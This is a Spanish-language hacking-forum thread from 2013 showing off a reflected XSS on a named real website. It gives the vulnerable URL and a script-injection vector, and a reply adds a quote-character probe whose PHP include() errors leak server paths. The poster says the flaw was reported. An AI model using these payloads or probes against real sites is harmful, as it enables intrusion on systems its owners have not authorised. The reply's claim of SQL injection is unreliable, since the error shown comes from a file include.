Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: F0M3T en Abril 07, 2013, 09:40:07 pm

Título: [Reflected XSS] Nilswogram.com
Publicado por: F0M3T en Abril 07, 2013, 09:40:07 pm
Url: http://www.nilswogram.com
Url afectado: http://www.nilswogram.com/public/gallery.php?id=5
Vector: "><script>alert(/F0M3T - UNDERC[0]DE/);</script>
Imagen:
(http://i.imgur.com/pqQNOWg.png)

Reportado: Sí.

(http://i.imgur.com/55pvNsz.png)
Título: Re:[Reflected XSS] Nilswogram.com
Publicado por: Jimeno en Abril 08, 2013, 10:10:37 am
Creo que también tenga SQLi, mira:
 URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
Citar
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Título: Re:[Reflected XSS] Nilswogram.com
Publicado por: F0M3T en Abril 08, 2013, 05:15:25 pm
Creo que también tenga SQLi, mira:
 URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
Citar
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Sí me percaté de esa vulnerabilidad, pero no se puede explotar, gracias por la aclaración.
Saludos.